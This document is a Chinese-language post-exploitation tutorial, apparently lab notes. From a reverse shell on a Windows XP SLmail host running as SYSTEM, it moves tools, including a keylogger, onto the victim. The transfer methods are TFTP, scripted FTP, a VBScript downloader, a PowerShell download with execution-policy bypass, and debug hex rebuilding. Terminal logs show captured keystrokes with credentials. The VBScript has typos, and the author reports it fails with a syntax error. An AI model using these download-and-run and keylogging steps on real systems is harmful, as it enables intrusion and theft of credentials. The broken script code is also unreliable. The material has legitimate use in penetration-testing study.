Kali 后渗透
一、概述
• 上传工具
• 提权
• 擦除攻击痕迹
删除系统日记和应用程序日记
示例(SLmail):
• 安装后门
• 长期控制
• Dump 密码
• 内网渗透
• 后漏洞利用阶段
• 最大的挑战 ——防病毒软件(免杀)
• 使用合法的远程控制软件(如 nc)
• 上传文件
• 持久控制
• 扩大对目标系统的控制能力
• Linux系统
• netcat,curl,wget
curl和wget一定会在linux系统下默认安装
• Windows
• 缺少预装的下载工具,难以进行木马等工具的下载
• 非交互模式 shell(如该命令行窗口下必须输入完整的命令,无法tab键补全)
• 类 NC远程控制shell
• 交互型shell与非交互型shell区别:http://kuku789123.blog.163.com/blog/static/1361673512012101513628599/
• ftp IP
在windows系统下安装ftp软件,体验非交互型shell的不足,添加/删除组件中【appwiz.cpl】【需插入光盘】
备注:IIS5.1 组件安装包:https://www.cr173.com/soft/2482.html
非交互:
交互:
二、上传文件
1、TFTP传输
XP、2003中已默认安装,Win7、2008以后的系统需要单独添加,但经常被边界防火墙过滤。主流为FTP,是因为基于UDP协议,明文传输,不支持身份验证(无需登录验证即可下载服务器文件)
即构造一个TFTP服务器,在服务器中放置工具木马等,再通过被控端连接下载。
1.1 环境部署
Kali:
root@kali:~/Desktop# mkdir tftp root@kali:~/Desktop# cp /usr/share/windows-binaries/whoami.exe tftp/ #windows下查看当前用户 root@kali:~/Desktop# cp /usr/share/windows-binaries/klogger.exe tftp/ #拷贝键盘记录器 root@kali:~/Desktop# ls tftp/ klogger.exe whoami.exe root@kali:~/Desktop# ls tftp/ -l total 92 -rwxr-xr-x 1 root root 23552 Feb 6 23:16 klogger.exe -rwxr-xr-x 1 root root 66560 Feb 6 23:16 whoami.exe root@kali:~/Desktop/tftp# chown -R nobody /root/Desktop/tftp/将所有者改成nobody root@kali:~/Desktop/tftp# ls -ll total 92 -rwxr-xr-x 1 nobody root 23552 Feb 6 23:16 klogger.exe -rwxr-xr-x 1 nobody root 66560 Feb 6 23:16 whoami.exe root@kali:~/Desktop/tftp# atftpd --daemon --port 69 /root/Desktop/tftp/ root@kali:~/Desktop/tftp# netstat -pantu | grep 69 udp 0 0 0.0.0.0:69 0.0.0.0:* 1636/atftpd
由于权限问题,会出现以下这个常见问题(启动进程不是tftp):
需kill 543这个进程,使用chown -R nobody /tftp/ 【将所有者改成nobody】
1.2 shell传输文件
root@kali:~/Desktop# nc -vlp 444 listening on [any] 444 ... 10.10.10.131: inverse host lookup failed: Unknown host connect to [10.10.10.171] from (UNKNOWN) [10.10.10.131] 1108 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Program Files\SLmail\System>cd \ cd \ C:\>tftp tftp Transfers files to and from a remote computer running the TFTP service. TFTP [-i] host [GET | PUT] source [destination] -i Specifies binary image transfer mode (also called octet). In binary image mode the file is moved literally, byte by byte. Use this mode when transferring binary files. host Specifies the local or remote host. GET Transfers the file destination on the remote host to the file source on the local host. PUT Transfers the file source on the local host to the file destination on the remote host. source Specifies the file to transfer. destination Specifies where to transfer the file. C:\>tftp -i 10.10.10.171 get whoami.exe tftp -i 10.10.10.171 get whoami.exe Transfer successful: 66560 bytes in 1 second, 66560 bytes/s C:\>tftp -i 10.10.10.171 get klogger.exe tftp -i 10.10.10.171 get klogger.exe Transfer successful: 23552 bytes in 1 second, 23552 bytes/s C:\>dir dir Volume in drive C has no label. Volume Serial Number is 0CCA-0323 Directory of C:\ 02/07/2022 12:40 PM 41 1.txt 08/14/2011 01:35 PM 0 AUTOEXEC.BAT 08/14/2011 01:35 PM 0 CONFIG.SYS 01/28/2022 01:28 PM <DIR> Documents and Settings 02/07/2022 11:40 AM 1,120 HistorySvr.txt 01/28/2010 06:10 PM <DIR> I386 02/07/2022 11:49 AM <DIR> Inetpub 02/07/2022 12:50 PM 23,552 klogger.exe 01/28/2022 01:38 PM <DIR> Program Files 01/27/2022 07:46 PM <DIR> Python27 02/07/2022 12:27 PM 0 TFTP4092 02/07/2022 12:25 PM 0 TFTP588 02/07/2022 12:50 PM 66,560 whoami.exe 02/07/2022 11:49 AM <DIR> WINDOWS 8 File(s) 91,273 bytes 6 Dir(s) 39,066,075,136 bytes free C:\>whoami whoami NT AUTHORITY\SYSTEM C:\>klogger klogger C:\>tasklist tasklist Image Name PID Session Name Session# Mem Usage ========================= ====== ================ ======== ============ System Idle Process 0 Console 0 28 K System 4 Console 0 236 K smss.exe 560 Console 0 388 K csrss.exe 608 Console 0 3,852 K winlogon.exe 632 Console 0 1,620 K services.exe 676 Console 0 4,312 K lsass.exe 688 Console 0 1,476 K vmacthlp.exe 848 Console 0 2,380 K svchost.exe 860 Console 0 4,700 K svchost.exe 940 Console 0 4,100 K svchost.exe 1032 Console 0 21,332 K svchost.exe 1080 Console 0 3,376 K svchost.exe 1124 Console 0 4,284 K spoolsv.exe 1404 Console 0 6,008 K HistorySvr.exe 1572 Console 0 3,248 K sntlkeyssrvr.exe 1668 Console 0 2,364 K spnsrvnt.exe 1820 Console 0 2,120 K SLadmin.exe 1836 Console 0 3,088 K SLSmtp.exe 1908 Console 0 4,748 K vmtoolsd.exe 1944 Console 0 8,484 K SLMail.exe 2020 Console 0 5,208 K VMUpgradeHelper.exe 176 Console 0 3,856 K alg.exe 1100 Console 0 3,432 K explorer.exe 1708 Console 0 24,048 K VMwareTray.exe 2164 Console 0 4,468 K VMwareUser.exe 2196 Console 0 7,688 K ICQLite.exe 2204 Console 0 14,308 K wscntfy.exe 2216 Console 0 1,904 K inetinfo.exe 2324 Console 0 9,720 K cmd.exe 516 Console 0 2,508 K ftp.exe 1984 Console 0 2,880 K cmd.exe 3996 Console 0 2,504 K ftp.exe 4080 Console 0 2,884 K taskmgr.exe 2824 Console 0 1,344 K cmd.exe 3040 Console 0 2,672 K klogger.exe 964 Console 0 792 K tasklist.exe 592 Console 0 4,080 K wmiprvse.exe 2976 Console 0 5,572 K C:\>dir dir Volume in drive C has no label. Volume Serial Number is 0CCA-0323 Directory of C:\ 02/07/2022 12:54 PM 30 1.txt 08/14/2011 01:35 PM 0 AUTOEXEC.BAT 08/14/2011 01:35 PM 0 CONFIG.SYS 01/28/2022 01:28 PM <DIR> Documents and Settings 02/07/2022 11:40 AM 1,120 HistorySvr.txt 01/28/2010 06:10 PM <DIR> I386 02/07/2022 11:49 AM <DIR> Inetpub 02/07/2022 12:50 PM 23,552 klogger.exe 02/07/2022 12:54 PM 32 klogger.txt 01/28/2022 01:38 PM <DIR> Program Files 01/27/2022 07:46 PM <DIR> Python27 02/07/2022 12:27 PM 0 TFTP4092 02/07/2022 12:25 PM 0 TFTP588 02/07/2022 12:50 PM 66,560 whoami.exe 02/07/2022 11:49 AM <DIR> WINDOWS 9 File(s) 91,294 bytes 6 Dir(s) 39,066,075,136 bytes free C:\>type klogger.txt #目标机的键盘记录 type klogger.txt ausername:z9m8r8 password:1111s C:\>
2、FTP传输
2.1 环境部署
root@kali:~/Desktop# apt-get install pure-ftpd Reading package lists... Done Building dependency tree Reading state information... Done The following additional packages will be installed: libcrypt1 libpam0g pure-ftpd-common Suggested packages: ……………………
配置脚本(ftp1.sh):
#!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd yuanfh -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ #创建的ftp主目录 /etc/init.d/pure-ftpd restart
脚本执行:
root@kali:~/Desktop/tftp# ./ftp1.sh Password: #此处设的密码要记住,后面会需要 Enter it again: Restarting pure-ftpd (via systemctl): pure-ftpd.service.
要上传的工具复制到 /ftphome/ 下
root@kali:/# ls /ftphome/ root@kali:/# cp /usr/share/windows-binaries/whoami.exe /ftphome/ root@kali:/# cp /usr/share/windows-binaries/klogger.exe /ftphome/
测试ftp:
由于目前获得的shell是非交互模式的,ftp传输时,在password命令处无法显示,所以当前直接利用ftp下载行不通,故转换思路:将要实现的命令写到目标服务器的文本文件中,用ftp读取文本文件的命令进行下载即可。
2.2 上传文件
C:\>echo open 10.10.10.171 21>ftp.txt echo yuanfh>>ftp.txt echo password>>ftp.txt #password是前面设置的密码 echo bin>>ftp.txt echo GET whoami.exe >> ftp.txt echo GET klogger.exe >> ftp.txt echo bye >> ftp.txt echo open 10.10.10.171 21>ftp.txt C:\>echo yuanfh>>ftp.txt C:\>echo password>>ftp.txt C:\>echo bin>>ftp.txt C:\>echo GET whoami.exe >> ftp.txt C:\>echo GET klogger.exe >> ftp.txt C:\>echo bye >> ftp.txt C:\>type ftp.txt type ftp.txt open 10.10.10.171 21 yuanfh password bin GET whoami.exe GET klogger.exe bye C:\>ftp -s:ftp.txt ftp -s:ftp.txt User (10.10.10.171:(none)): open 10.10.10.171 21 bin GET whoami.exe GET klogger.exe bye C:\>dir dir Volume in drive C has no label. Volume Serial Number is 0CCA-0323 Directory of C:\ 02/07/2022 12:54 PM 30 1.txt 08/14/2011 01:35 PM 0 AUTOEXEC.BAT 08/14/2011 01:35 PM 0 CONFIG.SYS 01/28/2022 01:28 PM <DIR> Documents and Settings 02/07/2022 02:25 PM 89 ftp.txt 02/07/2022 11:40 AM 1,120 HistorySvr.txt 01/28/2010 06:10 PM <DIR> I386 02/07/2022 11:49 AM <DIR> Inetpub 02/07/2022 02:26 PM 23,552 klogger.exe 01/28/2022 01:38 PM <DIR> Program Files 01/27/2022 07:46 PM <DIR> Python27 02/07/2022 12:27 PM 0 TFTP4092 02/07/2022 12:25 PM 0 TFTP588 02/07/2022 02:26 PM 66,560 whoami.exe 02/07/2022 11:49 AM <DIR> WINDOWS 9 File(s) 91,351 bytes 6 Dir(s) 39,067,385,856 bytes free C:\>whoami whoami NT AUTHORITY\SYSTEM C:\>
3、Vbscript传输
VBS是windows系统上默认的解释型脚本语言,在win7后增加了perl,通过web程序,http协议下载远程控制程序。
3.1 环境部署
root@kali:/# cd /var/www/html/ root@kali:/var/www/html# ls index.html index.nginx-debian.html root@kali:/var/www/html# cp /ftphome/* . root@kali:/var/www/html# ls index.html index.nginx-debian.html klogger.exe whoami.exe root@kali:/var/www/html# service apache2 start root@kali:/var/www/html# netstat -pantu | grep 80 tcp6 0 0 :::80 :::* LISTEN 27486/apache2
3.2 文件传输
命令集:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXSEITTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Noting Then Set http = CreateObjiect("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Noting Then Set http = CreateObjiect("WinHttp.MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Noting Then Set http = CreateObjiect("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Noting >> wget.vbs echo Set fs = CreateObject("Scrippting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Miidb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
将以上命令粘贴到 shell 窗口后再执行cscript wget.vbs http://10.10.10.171/whoami.exe w.exe(windows系统自带的cscipt命令去下载whoami.exe 命名成w.exe)
脚本执行报错信息(未解决,哪位大佬看出问题了,烦请指导下,感激不尽)
C:\>cscript wget.vbs http://10.10.10.171/whoami.exe whoami.exe cscript wget.vbs http://10.10.10.171/whoami.exe whoami.exe Microsoft (R) Windows Script Host Version 5.7 Copyright (C) Microsoft Corporation. All rights reserved. C:\wget.vbs(3, 6) Microsoft VBScript compilation error: Syntax error
4、POWERSHELL传输
类似vbs的传输,依旧是到目标服务器下载程序,注意需在win7,win8以后的系统运行。
命令集
$strongeDir = $pwd $webclient = New-Object System.Net.WebClient $url = "http://10.10.10.171/whoami.exe" $file = "new-exsploit.exe" $webclient DownloadFile($url,$file)
执行脚本:
powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -Noprofile -File wget.ps1
5、Debug传输
Debug是一种汇编、反汇编的16进制dump工具,作为文件传输,默认情况下只能传输64k字节的数据,并且可以修改Bios,考虑我们能不能直接把二进制的文件一行一行地echo进一个文件中,答案是否定的,不过这个思路是可以的,我们需要变通一下,将二进制文件转换成文本类型,之后进行传输,最后再用debug命令转化为二进制格式。
Kali 端的压缩
root@kali:~/Desktop/test# ls -alh whoami.exe -rwxr-xr-x 1 root root 65K Feb 7 03:09 whoami.exe root@kali:~/Desktop/test# upx -9 whoami.exe #-9:最高程度的压缩 Ultimate Packer for eXecutables Copyright (C) 1996 - 2018 UPX 3.95 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 26th 2018 File size Ratio Format Name -------------------- ------ ----------- ----------- 66560 -> 21113 31.72% win32/pe whoami.exe Packed 1 file. root@kali:~/Desktop/test# ls -alh whoami.exe -rwxr-xr-x 1 root root 21K Feb 7 03:09 whoami.exe
将需要传的二进制文件转换为文本文件
以whoami.exe为例(将/usr/share/windows-binaries/exe2bat.exe和whoami.exe拷贝到windows下):
当然kali下也可以转换,只不过需要安装window程序的执行环境(wine)
详情参见:https://www.cnblogs.com/z9m8r8/articles/15864240.html
传输文件
C:\>echo n 1.dll >123.hex echo e 0100 >>123.hex echo 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 >>123.hex echo e 0180 >>123.hex …………………… …………………… …………………… C:\>echo r cx >>123.hex C:\>echo 5279 >>123.hex C:\>echo w >>123.hex C:\>echo q >>123.hex C:\> C:\>dir dir Volume in drive C has no label. Volume Serial Number is 0CCA-0323 Directory of C:\ 02/07/2022 12:54 PM 30 1.txt 02/07/2022 04:21 PM 65,516 123.hex 08/14/2011 01:35 PM 0 AUTOEXEC.BAT 08/14/2011 01:35 PM 0 CONFIG.SYS 01/28/2022 01:28 PM <DIR> Documents and Settings 02/07/2022 03:00 PM 1,176 HistorySvr.txt 01/28/2010 06:10 PM <DIR> I386 02/07/2022 11:49 AM <DIR> Inetpub 01/28/2022 01:38 PM <DIR> Program Files 01/27/2022 07:46 PM <DIR> Python27 02/07/2022 03:30 PM 172 test.ps1 02/07/2022 12:27 PM 0 TFTP4092 02/07/2022 12:25 PM 0 TFTP588 02/07/2022 03:21 PM 1,113 wget.vbs 02/07/2022 11:49 AM <DIR> WINDOWS 9 File(s) 68,007 bytes 6 Dir(s) 39,068,635,136 bytes free C:\>debug<123.hex debug<123.hex -n 1.dll -e 0100 0ACA:0100 24. 4d 99.5a 04.90 80.00 0E.03 1E.00 99.00 04.00 0ACA:0108 80.04 3E.00 1F.00 99.00 00.ff 75.ff 24.00 80.00 0ACA:0110 3E.b8 62.00 97.00 01.00 74.00 1D.00 E8.00 5B.00 0ACA:0118 03.40 75.00 18.00 80.00 34.00 00.00 B9.00 0A.00 0ACA:0120 75.00 11.00 BA.00 EC.00 89.00 E8.00 4B.00 10.00 0ACA:0128 C7.00 06.00 21.00 96.00 00.00 00.00 FE.00 06.00 0ACA:0130 23.00 99.00 C3.00 8B.00 1E.00 5F.00 98.00 33.00 …………………… …………………… …………………… 0ACA:5370 00.00 00.00 00.00 00.00 00.00 00.00 00.00 00.00 0ACA:5378 00.00 00. 00. 00. -r cx CX 0000 :5279 -w Writing 05279 bytes -q C:\>dir dir Volume in drive C has no label. Volume Serial Number is 0CCA-0323 Directory of C:\ 02/07/2022 04:21 PM 21,113 1.DLL 02/07/2022 12:54 PM 30 1.txt 02/07/2022 04:21 PM 65,516 123.hex 08/14/2011 01:35 PM 0 AUTOEXEC.BAT 08/14/2011 01:35 PM 0 CONFIG.SYS 01/28/2022 01:28 PM <DIR> Documents and Settings 02/07/2022 03:00 PM 1,176 HistorySvr.txt 01/28/2010 06:10 PM <DIR> I386 02/07/2022 11:49 AM <DIR> Inetpub 01/28/2022 01:38 PM <DIR> Program Files 01/27/2022 07:46 PM <DIR> Python27 02/07/2022 03:30 PM 172 test.ps1 02/07/2022 12:27 PM 0 TFTP4092 02/07/2022 12:25 PM 0 TFTP588 02/07/2022 03:21 PM 1,113 wget.vbs 02/07/2022 11:49 AM <DIR> WINDOWS 10 File(s) 89,120 bytes 6 Dir(s) 39,068,598,272 bytes free C:\>copy 1.dll whoami.exe copy 1.dll whoami.exe 1 file(s) copied. C:\>dir dir Volume in drive C has no label. Volume Serial Number is 0CCA-0323 Directory of C:\ 02/07/2022 04:21 PM 21,113 1.DLL 02/07/2022 04:21 PM 65,516 123.hex 08/14/2011 01:35 PM 0 AUTOEXEC.BAT 08/14/2011 01:35 PM 0 CONFIG.SYS 01/28/2022 01:28 PM <DIR> Documents and Settings 02/07/2022 03:00 PM 1,176 HistorySvr.txt 01/28/2010 06:10 PM <DIR> I386 02/07/2022 11:49 AM <DIR> Inetpub 01/28/2022 01:38 PM <DIR> Program Files 01/27/2022 07:46 PM <DIR> Python27 02/07/2022 03:30 PM 172 test.ps1 02/07/2022 12:27 PM 0 TFTP4092 02/07/2022 12:25 PM 0 TFTP588 02/07/2022 03:21 PM 1,113 wget.vbs 02/07/2022 04:21 PM 21,113 whoami.exe 02/07/2022 11:49 AM <DIR> WINDOWS 10 File(s) 110,203 bytes 6 Dir(s) 39,068,573,696 bytes free C:\>whoami whoami NT AUTHORITY\SYSTEM C:\>
不忘初心,方得始终。
